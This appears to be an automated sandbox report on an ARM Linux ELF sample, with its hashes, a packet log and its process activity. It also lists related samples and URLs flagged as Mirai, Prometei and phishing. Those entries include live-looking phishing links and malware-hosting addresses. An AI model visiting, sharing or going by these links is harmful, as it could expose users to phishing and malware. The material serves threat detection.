CANONICAL-AS (GB) | SecuriteInfo.com.Linux.Mirai.4306.30063.19032.elf | malicious | Unknown | 185.125.190.26
CANONICAL-AS (GB) | SecuriteInfo.com.FileRepMalware.29874.30583.elf | malicious | Unknown | 91.189.91.42
CANONICAL-AS (GB) | SecuriteInfo.com.FileRepMalware.2065.17794.elf | malicious | Unknown | 91.189.91.42
CANONICAL-AS (GB) | boatnet.arm6.elf | malicious | Mirai | 91.189.91.42
CANONICAL-AS (GB) | na.elf | malicious | Prometei | 91.189.91.42
CANONICAL-AS (GB) | na.elf | malicious | Prometei | 91.189.91.42
CANONICAL-AS (GB) | na.elf | malicious | Prometei | 91.189.91.42
CANONICAL-AS (GB) | na.elf | malicious | Prometei | 91.189.91.42
AMAZON-02 (US) | na.elf | malicious | Prometei | 54.171.230.55
AMAZON-02 (US) | 220-002-1.pdf | malicious | HTMLPhisher | 13.226.94.59
AMAZON-02 (US) | https://www.transfernow.net/dl/20250326vT4te41F | malicious | Unknown | 13.216.34.24
AMAZON-02 (US) | na.elf | malicious | Prometei | 34.249.145.219
AMAZON-02 (US) | http://gitmeidlaw.com/ | malicious | Unknown | 13.33.252.122
AMAZON-02 (US) | https://www.canva.com/design/DAGiRhhTm_M/1Wb1338QF_BEv0zYs4WfZQ/view?utm_content=DAGiRhhTm_M&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h6159cd66cf&umid=b05be093-6f53-49ec-8a3b-87bea166f93e&auth=5175c0148660b71d9cf40f5d2581457ec88fc189-b6bc2ea861a256fc841ad8d60030f2289750b83 | malicious | HTMLPhisher | 13.35.93.29
AMAZON-02 (US) | SecuriteInfo.com.Linux.Mirai.4306.30063.19032.elf | malicious | Unknown | 54.247.62.1
AMAZON-02 (US) | https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com | malicious | HTMLPhisher, Mamba2FA | 3.168.73.27
AMAZON-02 (US) | SecuriteInfo.com.FileRepMalware.2065.17794.elf | malicious | Unknown | 54.171.230.55
AMAZON-02 (US) | SecuriteInfo.com.Linux.Mirai.2522.5402.17083.elf | malicious | Unknown | 54.171.230.55
INIT7 (CH) | na.elf | malicious | Prometei | 109.202.202.202
INIT7 (CH) | na.elf | malicious | Prometei | 109.202.202.202
INIT7 (CH) | SecuriteInfo.com.FileRepMalware.29874.30583.elf | malicious | Unknown | 109.202.202.202
INIT7 (CH) | SecuriteInfo.com.FileRepMalware.2065.17794.elf | malicious | Unknown | 109.202.202.202
INIT7 (CH) | boatnet.arm6.elf | malicious | Mirai | 109.202.202.202
INIT7 (CH) | na.elf | malicious | Prometei | 109.202.202.202
INIT7 (CH) | na.elf | malicious | Prometei | 109.202.202.202
INIT7 (CH) | na.elf | malicious | Prometei | 109.202.202.202
INIT7 (CH) | na.elf | malicious | Prometei | 109.202.202.202
INIT7 (CH) | na.elf | malicious | Prometei | 109.202.202.202
No context
No context
No created / dropped files found
File type: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, missing section headers at 307920
Entropy (8bit): 6.176001000949916
TrID:
• ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name: bin.sh.elf
File size: 254'180 bytes
MD5: fe597b006a3b685aa0e6680b2f8193a8
SHA1: a9b07391bac6600d7cb21f26308039cf5b94fc5f
SHA256: a9b27492292904b108baf4ae4578b7354d4257094a513e3db48f35b3684cb0eb
SHA512: 28e03d190b3d8f4ed0dfbc9723e5d862d8ed3e34040811d92f3ef6ec813318cea401b42c77f272448127603aa9a6448a55db9241766ff5a55614b399e087c9eb
SSDEEP: 6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOh:T2s/bW+UmJqBxAuaPRhVabEDSDP99zB7
TLSH: AC44398AFD81AF25D5D4227BFE2F428A33131BB8D2EB71129D145F24768A94F0F3A541
File Content Preview: .ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S


• Total Packets: 12
• 443 (HTTPS)
• 80 (HTTP)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 27, 2025 15:38:51.239258051 CET | 33608 | 443 | 192.168.2.23 | 54.171.230.55
Mar 27, 2025 15:38:52.263200045 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42
Mar 27, 2025 15:38:57.638365984 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43
Mar 27, 2025 15:38:59.430032969 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202
Mar 27, 2025 15:39:12.484239101 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42
Mar 27, 2025 15:39:19.846681118 CET | 39242 | 443 | 192.168.2.23 | 34.249.145.219
Mar 27, 2025 15:39:19.846735001 CET | 443 | 39242 | 34.249.145.219 | 192.168.2.23
Mar 27, 2025 15:39:19.846836090 CET | 39242 | 443 | 192.168.2.23 | 34.249.145.219
Mar 27, 2025 15:39:19.847193003 CET | 39242 | 443 | 192.168.2.23 | 34.249.145.219
Mar 27, 2025 15:39:19.847228050 CET | 443 | 39242 | 34.249.145.219 | 192.168.2.23
Mar 27, 2025 15:39:24.770587921 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43
Mar 27, 2025 15:39:28.866112947 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202
Mar 27, 2025 15:39:53.438683033 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42
Mar 27, 2025 15:40:19.839283943 CET | 39242 | 443 | 192.168.2.23 | 34.249.145.219
Mar 27, 2025 15:40:19.880281925 CET | 443 | 39242 | 34.249.145.219 | 192.168.2.23
Mar 27, 2025 15:40:56.024270058 CET | 443 | 39242 | 34.249.145.219 | 192.168.2.23

System Behavior

Start time (UTC): 14:38:52
Start date (UTC): 27/03/2025
Path: /tmp/bin.sh.elf
Arguments: /tmp/bin.sh.elf
File size: 4956856 bytes
MD5 hash: 5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC): 14:40:19
Start date (UTC): 27/03/2025
Path: /usr/bin/dash
Arguments: -
File size: 129816 bytes
MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC): 14:40:19
Start date (UTC): 27/03/2025
Path: /usr/bin/rm
Arguments: rm -f /tmp/tmp.Lzow55mshg /tmp/tmp.eiD2yHyWi8 /tmp/tmp.Fo6CyQGYn7
File size: 72056 bytes
MD5 hash: aa2b5496fdbfd88e38791ab81f90b95b
